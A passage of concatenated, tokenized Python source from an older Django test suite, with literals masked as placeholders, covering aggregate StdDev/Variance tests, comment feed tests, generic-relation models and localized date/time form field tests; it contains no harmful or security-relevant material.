<EOL> def test_quoting_aggregate_order_by ( self ) : <EOL> qs = Book . objects . filter ( <EOL> name = "<STR_LIT>" <EOL> ) . annotate ( <EOL> authorCount = Count ( "<STR_LIT>" ) <EOL> ) . order_by ( "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> qs , [ <EOL> ( "<STR_LIT>" , <NUM_LIT:3> ) , <EOL> ] , <EOL> lambda b : ( b . name , b . authorCount ) <EOL> ) <EOL> if run_stddev_tests ( ) : <EOL> def test_stddev ( self ) : <EOL> self . 
assertEqual ( <EOL> Book . objects . aggregate ( StdDev ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( StdDev ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( StdDev ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:2> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( StdDev ( '<STR_LIT>' , sample = True ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:2> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( StdDev ( '<STR_LIT>' , sample = True ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:2> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( StdDev ( '<STR_LIT>' , sample = True ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Variance ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Variance ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Variance ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Variance ( '<STR_LIT>' , sample = True ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Variance ( '<STR_LIT>' , sample = True ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:2> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . 
aggregate ( Variance ( '<STR_LIT>' , sample = True ) ) , <EOL> { '<STR_LIT>' : Approximate ( <NUM_LIT> , <NUM_LIT:2> ) } <EOL> ) </s>
<s> import warnings <EOL> from django . test . utils import get_warnings_state , restore_warnings_state <EOL> from regressiontests . comment_tests . tests import CommentTestCase <EOL> class CommentFeedTests ( CommentTestCase ) : <EOL> urls = '<STR_LIT>' <EOL> feed_url = '<STR_LIT>' <EOL> def test_feed ( self ) : <EOL> response = self . client . get ( self . feed_url ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertEquals ( response [ '<STR_LIT:Content-Type>' ] , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> class LegacyCommentFeedTests ( CommentFeedTests ) : <EOL> feed_url = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> self . _warnings_state = get_warnings_state ( ) <EOL> warnings . filterwarnings ( "<STR_LIT:ignore>" , category = DeprecationWarning , <EOL> module = '<STR_LIT>' ) <EOL> warnings . filterwarnings ( "<STR_LIT:ignore>" , category = DeprecationWarning , <EOL> module = '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> restore_warnings_state ( self . _warnings_state ) </s>
<s> from django . db import models <EOL> from django . contrib . contenttypes import generic <EOL> from django . contrib . contenttypes . models import ContentType <EOL> class Award ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT> ) <EOL> object_id = models . PositiveIntegerField ( ) <EOL> content_type = models . ForeignKey ( ContentType ) <EOL> content_object = generic . GenericForeignKey ( ) <EOL> class AwardNote ( models . Model ) : <EOL> award = models . ForeignKey ( Award ) <EOL> note = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> class Person ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT> ) <EOL> awards = generic . GenericRelation ( Award ) <EOL> class Book ( models . Model ) : <EOL> pagecount = models . IntegerField ( ) <EOL> class Toy ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:50> ) <EOL> class Child ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:50> ) <EOL> toys = models . ManyToManyField ( Toy , through = '<STR_LIT>' ) <EOL> class PlayedWith ( models . Model ) : <EOL> child = models . ForeignKey ( Child ) <EOL> toy = models . ForeignKey ( Toy ) <EOL> date = models . DateField ( db_column = '<STR_LIT>' ) <EOL> class PlayedWithNote ( models . Model ) : <EOL> played = models . ForeignKey ( PlayedWith ) <EOL> note = models . TextField ( ) </s>
<s> from datetime import time , date , datetime <EOL> from unittest import TestCase <EOL> from django import forms <EOL> from django . conf import settings <EOL> from django . utils . translation import activate , deactivate <EOL> class LocalizedTimeTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . old_TIME_INPUT_FORMATS = settings . TIME_INPUT_FORMATS <EOL> self . old_USE_L10N = settings . USE_L10N <EOL> settings . TIME_INPUT_FORMATS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> settings . USE_L10N = True <EOL> activate ( '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> settings . TIME_INPUT_FORMATS = self . old_TIME_INPUT_FORMATS <EOL> settings . USE_L10N = self . old_USE_L10N <EOL> deactivate ( ) <EOL> def test_timeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_timeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . 
assertEqual ( text , "<STR_LIT>" ) <EOL> def test_timeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_timeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class CustomTimeInputFormatsTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . old_TIME_INPUT_FORMATS = settings . TIME_INPUT_FORMATS <EOL> settings . TIME_INPUT_FORMATS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def tearDown ( self ) : <EOL> settings . TIME_INPUT_FORMATS = self . old_TIME_INPUT_FORMATS <EOL> def test_timeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( ) <EOL> self . 
assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_timeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_timeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . 
assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_timeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class SimpleTimeFormatTests ( TestCase ) : <EOL> def test_timeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_timeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . 
assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_timeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_timeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class LocalizedDateTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . old_DATE_INPUT_FORMATS = settings . DATE_INPUT_FORMATS <EOL> self . old_USE_L10N = settings . USE_L10N <EOL> settings . DATE_INPUT_FORMATS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> settings . USE_L10N = True <EOL> activate ( '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> settings . DATE_INPUT_FORMATS = self . old_DATE_INPUT_FORMATS <EOL> settings . 
USE_L10N = self . old_USE_L10N <EOL> deactivate ( ) <EOL> def test_dateField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_dateField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . 
assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class CustomDateInputFormatsTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . old_DATE_INPUT_FORMATS = settings . DATE_INPUT_FORMATS <EOL> settings . DATE_INPUT_FORMATS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def tearDown ( self ) : <EOL> settings . DATE_INPUT_FORMATS = self . old_DATE_INPUT_FORMATS <EOL> def test_dateField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . 
assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_dateField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . 
assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class SimpleDateFormatTests ( TestCase ) : <EOL> def test_dateField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_dateField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . 
assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class LocalizedDateTimeTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . old_DATETIME_INPUT_FORMATS = settings . DATETIME_INPUT_FORMATS <EOL> self . old_USE_L10N = settings . USE_L10N <EOL> settings . DATETIME_INPUT_FORMATS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> settings . USE_L10N = True <EOL> activate ( '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> settings . DATETIME_INPUT_FORMATS = self . old_DATETIME_INPUT_FORMATS <EOL> settings . USE_L10N = self . old_USE_L10N <EOL> deactivate ( ) <EOL> def test_dateTimeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . 
assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateTimeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_dateTimeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateTimeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . 
